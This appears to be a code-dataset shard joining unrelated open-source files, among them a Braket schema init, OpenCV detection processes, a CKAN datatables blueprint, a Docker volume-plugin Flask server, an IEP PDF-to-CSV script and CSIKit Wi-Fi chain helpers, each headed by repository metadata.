: 5, }, { "id" : "7039", "name" : "<NAME>", "type" : "Combat", "mpCost" : 10, }, { "id" : "7040", "name" : "<NAME>", "type" : "Combat", "mpCost" : 0, }, { "id" : "7041", "name" : "<NAME>", "type" : "Combat", "mpCost" : 0, }, { "id" : "7042", "name" : "Rise From Your Ashes", "type" : "Combat", "mpCost" : 20, }, { "id" : "7043", "name" : "<NAME>", "type" : "Combat", "mpCost" : 10, }, { "id" : "7044", "name" : "The Statue Treatment", "type" : "Combat", "mpCost" : 20, }, { "id" : "7045", "name" : "<NAME>", "type" : "Combat", "mpCost" : 20, }, { "id" : "7046", "name" : "Give Your Opponent \"The Bird\"", "type" : "Combat", "mpCost" : 20, }, { "id" : "7047", "name" : "Ask the hobo for a drink", "type" : "Combat", "mpCost" : 0, }, { "id" : "7048", "name" : "Ask the hobo for something to eat", "type" : "Combat", "mpCost" : 0, }, { "id" : "7049", "name" : "Ask the hobo for some violence", "type" : "Combat", "mpCost" : 0, }, { "id" : "7050", "name" : "<NAME> to tell you a joke", "type" : "Combat", "mpCost" : 0, }, { "id" : "7051", "name" : "Ask the hobo to dance for you", "type" : "Combat", "mpCost" : 0, }, { "id" : "7052", "name" : "<NAME>", "type" : "Combat", "mpCost" : 0, }, { "id" : "7053", "name" : "<NAME>", "type" : "Combat", "mpCost" : 15, }, { "id" : "7054", "name" : "<NAME>", "type" : "Combat", "mpCost" : 15, }, { "id" : "7055", "name" : "<NAME>", "type" : "Combat", "mpCost" : 15, }, { "id" : "7056", "name" : "<NAME>", "type" : "Combat", "mpCost" : 10, }, { "id" : "7061", "name" : "Spring Raindrop Attack", "type" : "Combat", "mpCost" : 0, }, { "id" : "7062", "name" : "<NAME>", "type" : "Combat", "mpCost" : 10, }, { "id" : "7063", "name" : "Falling Leaf Whirlwind", "type" : "Combat", "mpCost" : 10, }, { "id" : "7064", "name" : "<NAME>", "type" : "Combat", "mpCost" : 10, }, { "id" : "7065", "name" : "<NAME>", "type" : "Combat", "mpCost" : 10, }, { "id" : "8000", "name" : "<NAME>", "type" : "Mystical Bookshelf", "mpCost" : 5, }, { "id" : "8100", "name" : "<NAME>", "type" : "Mystical Bookshelf", }, { "id" : "8101", "name" : "<NAME>", "type" : "Mystical Bookshelf", }, { "id" : "8200", "name" : "<NAME>", "type" : "Mystical Bookshelf", "mpCost" : 5, }, { "id" : "8201", "name" : "Summon \"Tasteful\" Gifts", "type" : "Mystical Bookshelf", "mpCost" : 5, }, ]
0.683594
1
src/braket/device_schema/rigetti/__init__.py
kjacky/amazon-braket-schemas-python
17
12752043
# Copyright Amazon.com Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License

from braket.device_schema.rigetti.rigetti_device_capabilities_v1 import (  # noqa: F401
    RigettiDeviceCapabilities,
)
from braket.device_schema.rigetti.rigetti_device_parameters_v1 import (  # noqa: F401
    RigettiDeviceParameters,
)
from braket.device_schema.rigetti.rigetti_provider_properties_v1 import (  # noqa: F401
    RigettiProviderProperties,
)
0.839844
1
[archived]/mcmt-tracking-python/mcmt-tracking-python/bin/mcmt/detection_process.py
sieniven/spot-it-3d
8
12752171
import os
import sys
import csv
import cv2
import math
import time
import numbers
import numpy as np
from multiprocessing import Process

# local imported codes
import parameters as parm
from object_tracking_util import Camera, scalar_to_rgb, setup_system_objects, \
    single_cam_detector, multi_cam_detector


class SingleCameraDetector(Process):
    """ Process for single camera detection """
    def __init__(self, index, queue, FPS):
        super().__init__()
        self.queue = queue
        self.index = index
        self.realtime = isinstance(self.index, numbers.Number)
        self.fps = FPS
        self.frame_h = None
        self.frame_w = None
        self.scale_factor = None
        self.aspect_ratio = None
        self.cap = None
        self.fgbg = None
        self.detector = None
        self.video_ends_indicator = 0
        self.frame_count = 0
        self.frame = None
        self.good_tracks = None
        self.origin = np.array([0, 0])
        self.tracks = []
        self.next_id = 0

    def run(self):
        self.cap = cv2.VideoCapture(self.index)
        self.frame_w = int(self.cap.get(cv2.CAP_PROP_FRAME_WIDTH))
        self.frame_h = int(self.cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
        self.scale_factor = math.sqrt(self.frame_w ** 2 + self.frame_h ** 2) / math.sqrt(848 ** 2 + 480 ** 2)
        self.aspect_ratio = self.frame_w / self.frame_h

        downsample = False
        if self.frame_w * self.frame_h > 1920 * 1080:
            downsample = True
            self.frame_w = 1920
            self.frame_h = int(1920 / self.aspect_ratio)
            self.scale_factor = math.sqrt(self.frame_w ** 2 + self.frame_h ** 2) / math.sqrt(848 ** 2 + 480 ** 2)

        self.fgbg, self.detector = setup_system_objects(self.scale_factor)

        # check if video capturing is successful
        ret, self.frame = self.cap.read()
        if ret:
            if self.realtime:
                print(f"Video Capture {self.index}: PASS")
            else:
                print(f"File Read \"{self.index}\": PASS")
        else:
            if self.realtime:
                print(f"Video Capture {self.index}: FAIL")
            else:
                print(f"File Read \"{self.index}\": FAIL")
            self.cap.release()

        while self.cap.isOpened():
            ret, self.frame = self.cap.read()
            if ret:
                self.frame = cv2.resize(self.frame, (self.frame_w, self.frame_h))
                self.good_tracks, self.tracks, self.next_id, self.frame = single_cam_detector(
                    self.tracks, self.next_id, self.index, self.fgbg, self.detector, self.fps,
                    self.frame_w, self.frame_h, self.scale_factor, self.origin, self.frame)

                if cv2.waitKey(1) & 0xFF == ord('q'):
                    break
            else:
                self.video_ends_indicator = 1
                break

            self.queue.put((self.good_tracks, self.frame_count, self.frame))
            self.frame_count += 1

            if self.video_ends_indicator == 1:
                break

        self.cap.release()
        cv2.destroyAllWindows()


class MultiCameraDetector(Process):
    """ Process for multi camera detection """
    def __init__(self, filenames, queue, FPS):
        super().__init__()
        self.filenames = filenames
        self.queue = queue
        self.realtime = isinstance(self.filenames[0], numbers.Number)
        self.cameras = []
        self.fps = FPS
        self.video_ends_indicator = 0
        self.frame_count = 0
        self.good_tracks = None
        self.start_timer = None
        self.end_timer = None

    def run(self):
        for filename in self.filenames:
            camera = Camera(filename, self.fps)
            ret, self.frame = camera.cap.read()
            if ret:
                self.cameras.append(camera)
                if self.realtime:
                    print(f"Video Capture {filename}: PASS")
                else:
                    print(f"File Read \"{filename}\": PASS")
            else:
                if self.realtime:
                    print(f"Video Capture {filename}: FAIL")
                else:
                    print(f"File Read \"{filename}\": FAIL")
                camera.cap.release()

        while True:
            self.start_timer = time.time()
            sendList = []

            for index, camera in enumerate(self.cameras):
                ret, frame = camera.cap.read()
                if ret:
                    frame = cv2.resize(frame, (camera.frame_w, camera.frame_h))
                    self.good_tracks, frame = multi_cam_detector(camera, frame)

                    if cv2.waitKey(1) & 0xFF == ord('q'):
                        self.video_ends_indicator = 1
                        break
                else:
                    self.video_ends_indicator = 1
                    break

                sendList.append((self.good_tracks, frame, camera.dead_tracks))

            # sendList: [(good_tracks_0, frame_0, dead_tracks_0), (good_tracks_1, frame_1, dead_tracks_1), frame_count]
            sendList.append((self.frame_count))
            self.queue.put(sendList)
            self.frame_count += 1

            if self.video_ends_indicator == 1:
                break

            self.end_timer = time.time()
            print(f"Detection process took: {self.end_timer - self.start_timer}")

        cv2.destroyAllWindows()

        for index, camera in enumerate(self.cameras):
            camera.cap.release()

            with open(f"data_out_{index}.csv", 'w', newline='') as csvfile:
                writer = csv.writer(csvfile)
                for row in camera.output_log:
                    writer.writerow(row)
2.15625
2
ckanext/datatablesview/blueprint.py
robin-NEC/ckan
1
12752299
# encoding: utf-8 from __future__ import annotations from typing import Any from urllib.parse import urlencode from flask import Blueprint from ckan.common import json from ckan.plugins.toolkit import get_action, request, h import re datatablesview = Blueprint(u'datatablesview', __name__) def merge_filters(view_filters: dict[str, Any], user_filters_str: str) -> dict[str, Any]: u''' view filters are built as part of the view, user filters are selected by the user interacting with the view. Any filters selected by user may only tighten filters set in the view, others are ignored. >>> merge_filters({ ... u'Department': [u'BTDT'], u'OnTime_Status': [u'ONTIME']}, ... u'CASE_STATUS:Open|CASE_STATUS:Closed|Department:INFO') {u'Department': [u'BTDT'], u'OnTime_Status': [u'ONTIME'], u'CASE_STATUS': [u'Open', u'Closed']} ''' filters = dict(view_filters) if not user_filters_str: return filters user_filters = {} for k_v in user_filters_str.split(u'|'): k, _sep, v = k_v.partition(u':') if k not in view_filters or v in view_filters[k]: user_filters.setdefault(k, []).append(v) for k in user_filters: filters[k] = user_filters[k] return filters def ajax(resource_view_id: str): resource_view = get_action(u'resource_view_show' )({}, { u'id': resource_view_id }) draw = int(request.form[u'draw']) search_text = str(request.form[u'search[value]']) offset = int(request.form[u'start']) limit = int(request.form[u'length']) view_filters = resource_view.get(u'filters', {}) user_filters = str(request.form[u'filters']) filters = merge_filters(view_filters, user_filters) datastore_search = get_action(u'datastore_search') unfiltered_response = datastore_search( {}, { u"resource_id": resource_view[u'resource_id'], u"limit": 0, u"filters": view_filters, } ) cols = [f[u'id'] for f in unfiltered_response[u'fields']] if u'show_fields' in resource_view: cols = [c for c in cols if c in resource_view[u'show_fields']] sort_list = [] i = 0 while True: if u'order[%d][column]' % i not in request.form: break sort_by_num = int(request.form[u'order[%d][column]' % i]) sort_order = ( u'desc' if request.form[u'order[%d][dir]' % i] == u'desc' else u'asc' ) sort_list.append(cols[sort_by_num] + u' ' + sort_order) i += 1 colsearch_dict = {} i = 0 while True: if u'columns[%d][search][value]' % i not in request.form: break v = str(request.form[u'columns[%d][search][value]' % i]) if v: k = str(request.form[u'columns[%d][name]' % i]) # replace non-alphanumeric characters with FTS wildcard (_) v = re.sub(r'[^0-9a-zA-Z\-]+', '_', v) # append ':*' so we can do partial FTS searches colsearch_dict[k] = v + u':*' i += 1 if colsearch_dict: search_text = json.dumps(colsearch_dict) else: search_text = re.sub(r'[^0-9a-zA-Z\-]+', '_', search_text) + u':*' if search_text else u'' try: response = datastore_search( {}, { u"q": search_text, u"resource_id": resource_view[u'resource_id'], u'plain': False, u'language': u'simple', u"offset": offset, u"limit": limit, u"sort": u', '.join(sort_list), u"filters": filters, } ) except Exception: query_error = u'Invalid search query... 
' + search_text dtdata = {u'error': query_error} else: data = [] for row in response[u'records']: record = {colname: str(row.get(colname, u'')) for colname in cols} # the DT_RowId is used in DT to set an element id for each record record['DT_RowId'] = 'row' + str(row.get(u'_id', u'')) data.append(record) dtdata = { u'draw': draw, u'recordsTotal': unfiltered_response.get(u'total', 0), u'recordsFiltered': response.get(u'total', 0), u'data': data } return json.dumps(dtdata) def filtered_download(resource_view_id: str): params = json.loads(request.form[u'params']) resource_view = get_action(u'resource_view_show' )({}, { u'id': resource_view_id }) search_text = str(params[u'search'][u'value']) view_filters = resource_view.get(u'filters', {}) user_filters = str(params[u'filters']) filters = merge_filters(view_filters, user_filters) datastore_search = get_action(u'datastore_search') unfiltered_response = datastore_search( {}, { u"resource_id": resource_view[u'resource_id'], u"limit": 0, u"filters": view_filters, } ) cols = [f[u'id'] for f in unfiltered_response[u'fields']] if u'show_fields' in resource_view: cols = [c for c in cols if c in resource_view[u'show_fields']] sort_list = [] for order in params[u'order']: sort_by_num = int(order[u'column']) sort_order = (u'desc' if order[u'dir'] == u'desc' else u'asc') sort_list.append(cols[sort_by_num] + u' ' + sort_order) cols = [c for (c, v) in zip(cols, params[u'visible']) if v] colsearch_dict = {} columns = params[u'columns'] for column in columns: if column[u'search'][u'value']: v = column[u'search'][u'value'] if v: k = column[u'name'] # replace non-alphanumeric characters with FTS wildcard (_) v = re.sub(r'[^0-9a-zA-Z\-]+', '_', v) # append ':*' so we can do partial FTS searches colsearch_dict[k] = v + u':*' if colsearch_dict: search_text = json.dumps(colsearch_dict) else: search_text = re.sub(r'[^0-9a-zA-Z\-]+', '_', search_text) + u':*' if search_text else '' return h.redirect_to( h.url_for( u'datastore.dump', resource_id=resource_view[u'resource_id']) + u'?' + urlencode( { u'q': search_text, u'plain': False, u'language': u'simple', u'sort': u','.join(sort_list), u'filters': json.dumps(filters), u'format': request.form[u'format'], u'fields': u','.join(cols), })) datatablesview.add_url_rule( u'/datatables/ajax/<resource_view_id>', view_func=ajax, methods=[u'POST'] ) datatablesview.add_url_rule( u'/datatables/filtered-download/<resource_view_id>', view_func=filtered_download, methods=[u'POST'] )
1.4375
1
pyload/load.py
lrterry/py-load
0
12752427
class BaseLoadTester(object):
    def __init__(self, config):
        self.config = config

    def before(self):
        raise NotImplementedError()

    def on_result(self):
        raise NotImplementedError()
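# Illustrative subclass sketch (editor's addition, not part of the original
# pyload/load.py): it only shows how the two hooks above are meant to be
# overridden; the class name and print statements are hypothetical.
class PrintingLoadTester(BaseLoadTester):
    def before(self):
        # one-time setup before the load run starts
        print("starting load test with config:", self.config)

    def on_result(self):
        # called by the driver whenever a result becomes available
        print("received a result")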
0.964844
1
segregation/__init__.py
weikang9009/segregation
0
12752555
<filename>segregation/__init__.py
__version__ = "1.3.0"

"""
:mod:`segregation` --- Spatial/Aspatial Segregation Analysis
=================================================
"""

from . import aspatial
from . import spatial
from . import inference
from . import decomposition
from . import util
from . import network
from . import local
from . import compute_all
0.851563
1
cloudkitty-9.0.0/cloudkitty/storage/v2/__init__.py
scottwedge/OpenStack-Stein
0
12752683
# -*- coding: utf-8 -*- # Copyright 2018 Objectif Libre # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # # @author: <NAME> # import abc import datetime from oslo_config import cfg import six from cloudkitty import storage_state storage_opts = [ cfg.IntOpt( 'retention_period', default=2400, help='Duration after which data should be cleaned up/aggregated. ' 'Duration is given in hours. Defaults to 2400 (100 days)' ), ] CONF = cfg.CONF CONF.register_opts(storage_opts, 'storage') @six.add_metaclass(abc.ABCMeta) class BaseStorage(object): """Abstract class for v2 storage objects.""" def __init__(self, *args, **kwargs): """Left empty so that child classes don't need to implement this.""" @abc.abstractmethod def init(self): """Called for storage backend initialization""" # NOTE(peschk_l): scope_id must not be used by any v2 storage backend. It # is only present for backward compatibility with the v1 storage. It will # be removed together with the v1 storage @abc.abstractmethod def push(self, dataframes, scope_id=None): """Pushes dataframes to the storage backend A dataframe has the following format:: { "usage": { "bananas": [ # metric name { "vol": { "unit": "banana", "qty": 1 }, "rating": { "price": 1 }, "groupby": { "xxx_id": "hello", "yyy_id": "bye", }, "metadata": { "flavor": "chocolate", "eaten_by": "gorilla", }, } ], "metric_name2": [...], } "period": { "begin": "1239781290", # timestamp "end": "1239793490", # timestamp } } :param dataframes: List of dataframes :type dataframes: list """ @abc.abstractmethod def retrieve(self, begin=None, end=None, filters=None, group_filters=None, metric_types=None, offset=0, limit=1000, paginate=True): """Returns the following dict:: { 'total': int, # total amount of measures found 'dataframes': list of dataframes, } :param begin: Start date :type begin: datetime :param end: End date :type end: datetime :param filters: Metadata to filter on. ex: {'flavor_id': '42'} :type filters: dict :param group_filters: Groupby to filter on. ex: {'project_id': '123ab'} :type group_filters: dict :param metric_types: Metric type to filter on. :type metric_types: str or list :param offset: Offset for pagination :type offset: int :param limit: Maximum amount of elements to return :type limit: int :param paginate: Defaults to True. If False, all found results will be returned. :type paginate: bool :rtype: dict """ @abc.abstractmethod def total(self, groupby=None, begin=None, end=None, metric_types=None, filters=None, group_filters=None, offset=0, limit=1000, paginate=True): """Returns a grouped total for given groupby. :param groupby: Attributes on which to group by. These attributes must be part of the 'groupby' section for the given metric type in metrics.yml. In order to group by metric type, add 'type' to the groupby list. :type groupby: list of strings :param begin: Start date :type begin: datetime :param end: End date :type end: datetime :param filters: Metadata to filter on. ex: {'flavor_id': '42'} :type filters: dict :param group_filters: Groupby to filter on. 
ex: {'project_id': '123ab'} :type group_filters: dict :param metric_types: Metric type to filter on. :type metric_types: str or list :param offset: Offset for pagination :type offset: int :param limit: Maximum amount of elements to return :type limit: int :param paginate: Defaults to True. If False, all found results will be returned. :type paginate: bool :rtype: dict Returns a dict with the following format:: { 'total': int, # total amount of results found 'results': list of results, } Each result has the following format:: { 'begin': XXX, 'end': XXX, 'rate': XXX, 'groupby1': XXX, 'groupby2': XXX } """ @staticmethod def get_retention(): """Returns the retention period defined in the configuration. :rtype: datetime.timedelta """ return datetime.timedelta(hours=CONF.storage.retention_period) # NOTE(lpeschke): This is only kept for v1 storage backward compatibility def get_tenants(self, begin=None, end=None): return storage_state.StateManager().get_tenants(begin, end)
1.492188
1
pyvolume/manager.py
ronin13/pyvolume
2
12752811
<gh_stars>1-10 # -*- coding: utf-8 -*- """ Module providing the MountMgr, VolumeManager and Flask methods. Following Docker Volume endpoints are routed below: '/Plugin.Activate' '/VolumeDriver.Create' '/VolumeDriver.Remove' '/VolumeDriver.List' '/VolumeDriver.Path' '/VolumeDriver.Mount' '/VolumeDriver.Unmount' '/VolumeDriver.Get' '/VolumeDriver.Capabilities' """ from __future__ import unicode_literals from __future__ import absolute_import import argparse import logging from flask import Flask from flask import jsonify from flask import request from pyvolume.local import EphemeralFileSystem from pyvolume.sshfs import SSHFileSystem from pyvolume.zkfuse import ZKFileSystem app = Flask(__name__) HOST = "0.0.0.0" PORT = 1331 DRIVER_TYPE = "sshfs" DEFAULT_BASE = "/mnt" logging.basicConfig(level=logging.INFO) log = logging.getLogger(__name__) class MountMgr(object): """ MountMgr is a helper class used during mounting/unmounting.""" def __init__(self, counter, mntpoint): self.counter = counter self.mntpoint = mntpoint class VolumeManager(object): """ VolumeManager is the class providing pluggable drivers for pyvolume, the drivers implementing the methods: 1. create 2. list 3. path 4. remove 5. mount 6. umount 7. scope 8. cleanup Currently, drivers available are EphemeralFileSystem, SSHFileSystem and Zookeeper FileSystem """ def __init__(self, driver, prefix): if driver == "ephemeral": self.driver = EphemeralFileSystem(prefix) elif driver == "sshfs": self.driver = SSHFileSystem(prefix) elif driver == "zookeeper": self.driver = ZKFileSystem(prefix) self.mount_mgr = {} self.driver_type = driver def cleanup(self): """ Cleanup done during shutdown of server.""" for volume in self.mount_mgr: self.mount_mgr[volume].counter = 0 self.mount_mgr[volume].mntpoint = None self.driver.cleanup() def dispatch(data): """ To jsonify the response with correct HTTP status code. Status codes: 200: OK 400: Error Err in JSON is non empty if there is an error. """ if "Err" in data and data["Err"] != "": code = 400 else: code = 200 resp = jsonify(data) resp.status_code = code return resp @app.route("/Plugin.Activate", methods=["POST"]) def implements(): """ Routes Docker Volume '/Plugin.Activate'.""" return dispatch({"Implements": ["VolumeDriver"]}) @app.route("/VolumeDriver.Create", methods=["POST"]) def create_volume(): """ Routes Docker Volume '/VolumeDriver.Create'.""" volm = app.config["volmer"] rdata = request.get_json(force=True) vol_name = rdata["Name"].strip("/") options = rdata["Opts"] try: volm.driver.create(vol_name, options) except Exception as e: return dispatch( {"Err": "Failed to create the volume {0} : {1}".format(vol_name, str(e))} ) return dispatch({"Err": ""}) @app.route("/") def index(): return "Docker volume driver listening on " + str(PORT) @app.route("/VolumeDriver.Remove", methods=["POST"]) def remove_volume(): """ Routes Docker Volume '/VolumeDriver.Remove'.""" volm = app.config["volmer"] rdata = request.get_json(force=True) vol_name = rdata["Name"].strip("/") try: volm.driver.remove(vol_name) except Exception as e: return dispatch( {"Err": "Failed to remove the volume {0}: {1}".format(vol_name, str(e))} ) return dispatch({"Err": ""}) @app.route("/VolumeDriver.Mount", methods=["POST"]) def mount_volume(): """ Routes Docker Volume '/VolumeDriver.Mount'. Handles multiple invocations of mount for same volume. 
""" volm = app.config["volmer"] rdata = request.get_json(force=True) vol_name = rdata["Name"].strip("/") # vol_id = rdata['ID'] if vol_name in volm.mount_mgr: mntpoint = volm.mount_mgr[vol_name].mntpoint volm.mount_mgr[vol_name].counter += 1 log.info( "Volume {0} is mounted {1} times".format( vol_name, volm.mount_mgr[vol_name].counter ) ) return dispatch({"Mountpoint": mntpoint, "Err": ""}) try: mntpoint = volm.driver.mount(vol_name) volm.mount_mgr[vol_name] = MountMgr(1, mntpoint) except Exception as e: return dispatch( { "Mountpoint": "", "Err": "Failed to mount the volume {0}: {1}".format(vol_name, str(e)), } ) return dispatch({"Mountpoint": mntpoint, "Err": ""}) @app.route("/VolumeDriver.Path", methods=["POST"]) def path_volume(): """ Routes Docker Volume '/VolumeDriver.Path'. Returns Err if volume is not mounted. """ volm = app.config["volmer"] rdata = request.get_json(force=True) vol_name = rdata["Name"].strip("/") try: mntpoint = volm.driver.path(vol_name) except Exception as e: return dispatch( { "Mountpoint": "", "Err": "Failed to obtain path to the volume {0}: {1}".format( vol_name, str(e) ), } ) if not mntpoint: return dispatch( {"Mountpoint": "", "Err": "Volume {0} is not mounted".format(vol_name)} ) return dispatch({"Mountpoint": mntpoint, "Err": ""}) @app.route("/VolumeDriver.Unmount", methods=["POST"]) def unmount_volume(): """ Routes Docker Volume '/VolumeDriver.Unmount'. Handles multiple Unmount requests for volume mounted multiple times by only unmounting the last time. """ volm = app.config["volmer"] rdata = request.get_json(force=True) vol_name = rdata["Name"].strip("/") # vol_id = rdata['ID'] if vol_name in volm.mount_mgr: # mntpoint = volm.mount_mgr[vol_name].mntpoint volm.mount_mgr[vol_name].counter -= 1 if volm.mount_mgr[vol_name].counter > 0: log.info( "Still mounted {0} times to unmount".format( volm.mount_mgr[vol_name].counter ) ) return dispatch({"Err": ""}) try: res = volm.driver.umount(vol_name) if not res: return dispatch( {"Err": "Volume {0} may already be unmounted.".format(vol_name)} ) volm.mount_mgr.pop(vol_name) except Exception as e: return dispatch( {"Err": "Failed to umount the volume {0}: {1}".format(vol_name, str(e))} ) return dispatch({"Err": ""}) @app.route("/VolumeDriver.Get", methods=["POST"]) def get_volume(): """ Routes Docker Volume '/VolumeDriver.Get'.""" volm = app.config["volmer"] rdata = request.get_json(force=True) vol_name = rdata["Name"].strip("/") try: mntpoint = volm.driver.path(vol_name) except Exception as e: return dispatch( { "Err": "Failed to get the volume path for {0}: {1}".format( vol_name, str(e) ) } ) if not mntpoint: return dispatch( {"Mountpoint": "", "Err": "Volume {0} is not mounted".format(vol_name)} ) return dispatch( { "Volume": {"Name": vol_name, "Mountpoint": mntpoint, "Status": {},}, "Err": "", } ) @app.route("/VolumeDriver.List", methods=["POST"]) def list_volume(): """ Routes Docker Volume '/VolumeDriver.List'.""" volm = app.config["volmer"] mnt_list = [] try: vol_list = volm.driver.list() for volume in vol_list: mntpoint = volm.driver.path(volume) if not mntpoint: mntpoint = "<NOT-MOUNTED>" mnt_list += [{"Name": volume, "Mountpoint": mntpoint,}] except Exception as e: return dispatch({"Err": "Failed to list the volumes: {0}".format(str(e))}) return dispatch({"Volumes": mnt_list, "Err": "",}) @app.route("/VolumeDriver.Capabilities", methods=["POST"]) def capabilities_volume(): """ Routes Docker Volume '/VolumeDriver.Capabilities'.""" volm = app.config["volmer"] scope = volm.driver.scope() return 
dispatch({"Capabilities": {"Scope": scope}}) def shutdown_server(): """ Utility method for shutting down the server.""" func = request.environ.get("werkzeug.server.shutdown") if func is None: raise RuntimeError("Not running with the Werkzeug Server") func() @app.route("/shutdown", methods=["POST"]) def shutdown(): """ API end point exposed to shutdown the server.""" shutdown_server() return "Server shutting down..." parser = argparse.ArgumentParser(description="Arguments to volume router") parser.add_argument( "-t", "--driver", default=DRIVER_TYPE, help="Type of driver to use", choices=["sshfs", "ephemeral", "zookeeper"], ) parser.add_argument("-H", "--host", default=HOST, help="Host to listen on") parser.add_argument("-p", "--port", default=PORT, help="Port to listen on") parser.add_argument( "-m", "--base", default=DEFAULT_BASE, help="Base directory to mount over, default is " + DEFAULT_BASE, ) def start(): global PORT global HOST args = parser.parse_args() PORT = args.port HOST = args.host volmer = VolumeManager(args.driver, prefix=args.base) app.config["volmer"] = volmer try: app.run(host=args.host, port=args.port) finally: volmer.cleanup() if __name__ == "__main__": start()
1.601563
2
backend/app/api/api_v1/endpoints/users.py
BartlomiejRasztabiga/Rentally
2
12752939
<filename>backend/app/api/api_v1/endpoints/users.py
from typing import Any, List

from fastapi import APIRouter, Depends, HTTPException
from sqlalchemy.orm import Session

from app import models, schemas, services
from app.api import deps

router = APIRouter()


@router.get("/", response_model=List[schemas.User])
def read_users(
    db: Session = Depends(deps.get_db),
    current_user: models.User = Depends(deps.get_current_active_admin),
) -> Any:
    """
    Retrieve users.
    """
    users = services.user.get_all(db)
    return users


@router.post("/", response_model=schemas.User)
def create_user(
    *,
    db: Session = Depends(deps.get_db),
    user_in: schemas.UserCreateDto,
    current_user: models.User = Depends(deps.get_current_active_admin),
) -> Any:
    """
    Create new user.
    """
    user = services.user.get_by_email(db, email=user_in.email)
    if user:
        raise HTTPException(
            status_code=400,
            detail="The user with this username already exists in the system.",
        )
    user = services.user.create(db, obj_in=user_in)
    return user


@router.get("/me", response_model=schemas.User)
def read_user_me(
    db: Session = Depends(deps.get_db),
    current_user: models.User = Depends(deps.get_current_user),
) -> Any:
    """
    Get current user.
    """
    return current_user


@router.get("/{user_id}", response_model=schemas.User)
def read_user_by_id(
    user_id: int,
    current_user: models.User = Depends(deps.get_current_user),
    db: Session = Depends(deps.get_db),
) -> Any:
    """
    Get a specific user by id.
    """
    user = services.user.get(db, _id=user_id)
    if user == current_user:
        return user
    if not services.user.is_admin(current_user):
        raise HTTPException(
            status_code=400, detail="The user doesn't have enough privileges"
        )
    return user
1.398438
1
iep2csv.py
gregorysenyshyn/IEPeasy
0
12753067
<gh_stars>0
#! /usr/bin/env python3

import argparse
import os
import re
import csv

import PyPDF2


def get_data_re():
    return re.compile('Individual Education Plan for (.+?)Student ID.+?OEN ([0-9]{3}-[0-9]{3}-[0-9]{3}).+?Accommodations Instructional Environmental Assessment(.+?)(Human|!).+?<NAME> Date')


def file_checker(args, value_type, message):
    if vars(args)[value_type] is not None:
        if os.path.exists(vars(args)[value_type]):
            return vars(args)[value_type]
    else:
        value = None
        while not value:
            value = input(f"{message} location: ").strip()
            if os.path.exists(value):
                return value
            else:
                print(f"{value} is not a valid location")
                value = None


def extract_data(iep_text):
    data_re = get_data_re()
    data = data_re.finditer(iep_text)
    return data


def main(folder, output_dir):
    all_ieps_data = []
    for filename in os.listdir(folder):
        with open(os.path.join(folder, filename), 'rb') as f:
            reader = PyPDF2.PdfFileReader(f)
            writer = PyPDF2.PdfFileWriter()
            current_ugcloud = None
            iep_text = ''
            print(f"processing {filename} pages...\n")
            for page in reader.pages:
                raw_text = page.extractText()
                iep_text += raw_text.replace("\n", " ")
            students = extract_data(iep_text)
            for student in students:
                all_ieps_data.append(student)

    with open(args.output, 'a', newline='') as f:
        data_writer = csv.writer(f)
        for item in all_ieps_data:
            data_writer.writerow([item.group(1), item.group(2), item.group(3)])


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description=("Takes a folder with PDFs of IEPS"
                                                  "and copies specified fields to a CSV file"))
    parser.add_argument("-f", "--folder", dest="folder")
    parser.add_argument("-o", "--output", dest="output")
    args = parser.parse_args()
    print(args)
    folder = file_checker(args, "folder", "Folder of PDFs of IEPs")
    output = file_checker(args, "output", "Output")
    main(folder, output)
1.570313
2
CSIKit/legacy/utils.py
FredeJ/CSIKit
67
12753195
<filename>CSIKit/legacy/utils.py
def configure_tx_chains(txChains, streamNum, mcsIdx):
    txChains = txChains.lower()

    RATE_MCS_ANT_A_MSK = 0x04000
    RATE_MCS_ANT_B_MSK = 0x08000
    RATE_MCS_ANT_C_MSK = 0x10000
    RATE_MCS_HT_MSK = 0x00100

    mask = 0x0
    usedAntNum = 0
    if "a" in txChains:
        mask |= RATE_MCS_ANT_A_MSK
        usedAntNum += 1
    if "b" in txChains:
        mask |= RATE_MCS_ANT_B_MSK
        usedAntNum += 1
    if "c" in txChains:
        mask |= RATE_MCS_ANT_C_MSK
        usedAntNum += 1

    mask |= RATE_MCS_HT_MSK

    if streamNum > usedAntNum:
        print("Cannot use {} streams with {} antennas".format(streamNum, usedAntNum))
        print("Set stream num to {}".format(usedAntNum))
        streamNum = usedAntNum

    mcsMask = mcsIdx
    if streamNum == 2:
        mcsMask += 8
    elif streamNum == 3:
        mcsMask += 16
    mask |= mcsMask

    mask = "0x{:05x}".format(mask)
    print("Set TX mask: ", mask)

    filePath = "/sys/kernel/debug/iwlwifi/0000:03:00.0/iwldvm/debug/monitor_tx_rate"
    f = open(filePath, 'w')
    f.write(mask)
    f.close()


def configure_rx_chains(rxChains):
    rxChains = rxChains.lower()

    mask = 0x0
    aMask = 0x1
    bMask = 0x2
    cMask = 0x4
    if "a" in rxChains:
        mask |= aMask
    if "b" in rxChains:
        mask |= bMask
    if "c" in rxChains:
        mask |= cMask

    mask = "0x{:01x}".format(mask)
    print("Set RX chain mask: ", mask)

    filePath = "/sys/kernel/debug/iwlwifi/0000:03:00.0/iwldvm/debug/rx_chains_msk"
    f = open(filePath, 'w')
    f.write(mask)
    f.close()
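# Illustrative usage sketch (editor's addition, not part of the original
# CSIKit/legacy/utils.py). It assumes an Intel NIC exposing the iwlwifi
# debugfs files referenced above and must be run with root privileges.
if __name__ == "__main__":
    configure_rx_chains("abc")                          # receive on antennas A, B and C
    configure_tx_chains("ab", streamNum=2, mcsIdx=7)    # two spatial streams, MCS index 7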
1.414063
1
cloudify/tests/test_missing_operation.py
isaac-s/cloudify-common
0
12753323
<reponame>isaac-s/cloudify-common
########
# Copyright (c) 2014 GigaSpaces Technologies Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
